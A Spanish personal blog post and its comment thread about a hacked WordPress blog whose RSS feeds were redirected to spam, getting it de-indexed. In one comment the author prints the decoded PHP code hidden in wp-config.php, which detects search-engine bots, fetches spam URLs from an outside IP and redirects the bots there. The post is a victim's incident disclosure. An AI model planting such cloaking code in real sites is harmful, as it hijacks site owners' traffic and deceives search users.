Una explicación de lo sucedido…

Todos aquellos que me seguiáis desde hace bastante tiempo a través del blog es probable que en estos últimos días os hayáis encontrado con una oleada de entradas de SPAM en vuestro lector RSS (especialmente Google Reader). Es probable que si habéis visitado el blog, os hayáis sorprendido de descubrir que seguía escribiendo pero vosotros no habiáis leído nada de nada. ¿Qué pasó entonces?

Hace aproximadamente un año noté un bajón de las visitas del blog de unas doscientas o tresciencias diarias a unas veinte o treinta. No le di mucha importancia a eso, supuse que el programa de estadísticas al actualizarlo había cambiado la forma de medir. Sin embargo, con el paso del tiempo descubrí que Google y Bing me tenían baneado de su motor de búsquedas y más tarde, que Google tampoco actualizaba mi feed RSS.

Buscando el por qué, no encontré nada convincente, pero si lo habían hecho sus motivos tendría aunque no lo entendía del todo. Inagotable incluso me ayudó a ver si me volvía a meter Google en su buscador mediante enlaces en un post suyo 😀

La verdad es que no sé si ese post, o que volviera a solicitar que indexaran mi URL fue el motivo por el que Google volvió a mostrar resultados de mi página web y con ello a mostrar SPAM por el feed RSS. El motivo es que me habían crackeado el blog para dirigir los feeds RSS a una página web de SPAM si el visitante era algún bot, estaba en el fichero de configuración de WordPress y Google, Bing y compañía le ha bían hecho caso. Por lo tanto, ahora comprendí por qué llevaba un año bloqueado del buscador 🙁

La redirección que hicieron la establecieron de forma permanente, por lo que Google sigue actualizando en el Reader posts de SPAM a través de una de las URLs del feed RSS del blog. Sin embargo, podéis emplear ahora la de Feedburner para volver a recibir las notificaciones de los posts.

Perdón por el SPAM de estos días, a ver si Google lo actualiza de alguna vez! Si no, borrad los feeds antiguos y agregad el nuevo 🙂

This entry was posted in Sobre el blog. Bookmark the permalink.

4 Responses to Una explicación de lo sucedido…

  1. Inagotable says:

    Pero ¿cómo consiguieron redireccionar los RSS, qué fichero de configuración fue?

    Lo pregunto por si me pasa a mi 😛

  2. Onir says:

    Creo que a través de algún fallo del sistema de actualización automática de Dreamhost para WordPress quedó el fichero wp-config.php accesible para los atacantes. Dentro de él introdujeron una secuencia de código en Base64 que luego descodificaban y evaluaban.

    A simple vista no se veía nada ya que mirándolo desde las aplicaciones como nano o vim, debido a la tabulación que le habían puesto se salía del tamaño de la consola y parecía que estaba bien. Sin embargo, mirándolo con el cat descubrí esa secuencia que descodificaba hacía lo siguiente:

    $a=$_SERVER['HTTP_USER_AGENT'];
    if(eregi("google",$a) || eregi("Googlebot",$a) || eregi("slurp",$a)||eregi("msnbot",$a))
    {
     	$d2="212.117.169.139";
    	$f2="/tra.txt";
    	$fp2=fsockopen($d2,80,$erno,$erstr,30);
    
                    if(!$fp2) {
    		print "Err: $erstr [$erno]";
                    } else {
    		fwrite($fp2,"GET $f2 HTTP/1.0\r\n");
                    	fwrite($fp2,"Host: $d2\r\n\r\n");
                    
                    while(!feof($fp2)){		
                                    $h2.=fread($fp2,512);
                    }
                   fclose($fp2);
                    }
    	preg_match_all("!([^< ]+)!",$h2,$m2);
    	$r=$m2[1][rand(0,count($m2[0]))];
                    header("HTTP/1.1 302");
    	header("Location: $r");
                    exit();
    }
    
  3. Inagotable says:

    Buff, pues menos mal que lo detectaste.

    Supongo que darías aviso a Dreamhost.

  4. Onir says:

    Sí, lo pasaron del soporte normal a otro tipo de soporte, pero no he obtenido respuesta. De todas formas se lo envíe como informativo para que lo comprobaran ya que ya lo había corregido en el blog yo

Leave a Reply

Your email address will not be published. Required fields are marked *